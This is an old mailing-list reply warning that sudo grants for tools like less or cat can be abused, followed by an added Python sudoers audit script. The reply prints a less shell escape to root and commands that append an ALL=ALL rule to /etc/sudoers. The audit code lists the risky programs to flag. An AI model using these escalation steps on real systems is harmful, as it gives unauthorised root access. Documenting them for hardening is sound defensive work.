On Fri, Jul 06, 2001 at 09:43:55AM -0500, Nathan E Norman wrote:
>
> OTOH if you restrict the user to a list of commands in /etc/sudoers,
> it's wise to consider whether the user might be able to leverage one of
> those commands to edit /etc/sudoers (or any other file). If you're
> going to list "emacs" or "vi" in /etc/sudoers, you might as well just
> list "ALL" :)

or even seemingly innocuous things like less or even cat.

sudo less anything
!/bin/sh
whoami
r00t!

echo me ALL=ALL > s
sudo 'cat s >> /etc/sudoers'

sudo is a very large cannon which is difficult to keep aimed away from
the foot...

-- 
Ethan Benson
http://www.alaska.net/~erbenson/
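A defensive check that follows from the message above, as an added example that is not part of the original post: a small sudoers audit that flags grants of the programs named in the thread (emacs, vi, less, cat) and a bare ALL. The sample policy, its user names and the `audit` helper are constructed for illustration; the parser assumes one Cmnd_Alias definition per line and does not follow include directives.

```python
import os
import re

# Assumption: the risky set holds only the programs named in the message;
# extend it for your own environment.
RISKY = {
    "emacs": "editor: writes any file, can spawn a shell",
    "vi": "editor: writes any file, can spawn a shell",
    "less": "pager: shell escape from the prompt",
    "cat": "reads any file with the target user's privileges",
}

# Constructed sample policy, not taken from the original message.
SAMPLE = """\
Cmnd_Alias VIEW = /usr/bin/less, \\
                  /bin/cat
Defaults env_reset
alice ALL = (root) NOPASSWD: VIEW, /usr/bin/lpr
bob   ALL = /usr/bin/vi /etc/hosts
me    ALL=ALL
carol ALL = /usr/sbin/lpc
"""

def audit(text):
    """Return (user, command, reason) for each risky grant in sudoers text."""
    aliases, specs, findings = {}, [], []
    for raw in re.sub(r"\\\n", " ", text).splitlines():  # join continuations
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("Cmnd_Alias"):
            name, _, cmds = line[len("Cmnd_Alias"):].partition("=")
            aliases[name.strip()] = [c.strip() for c in cmds.split(",")]
        elif not re.match(r"(Defaults|\w+_Alias)\b", line):
            specs.append(line)
    for line in specs:
        who, _, rhs = line.partition("=")
        rhs = re.sub(r"^\s*\([^)]*\)", "", rhs)  # drop the (runas) part
        for item in rhs.split(","):
            item = re.sub(r"^\s*(?:[A-Z_]+:\s*)+", "", item).strip()  # drop tags
            for cmd in aliases.get(item, [item]):
                prog = os.path.basename(cmd.split()[0]) if cmd else ""
                if cmd == "ALL":
                    findings.append((who.split()[0], cmd, "unrestricted command access"))
                elif prog in RISKY:
                    findings.append((who.split()[0], cmd, RISKY[prog]))
    return findings

if __name__ == "__main__":
    for user, cmd, why in audit(SAMPLE):
        print(f"{user}: {cmd} -> {why}")
```

Each finding is a grant to review by hand: the script matches on program basename only, so it will not notice a risky binary installed under another name.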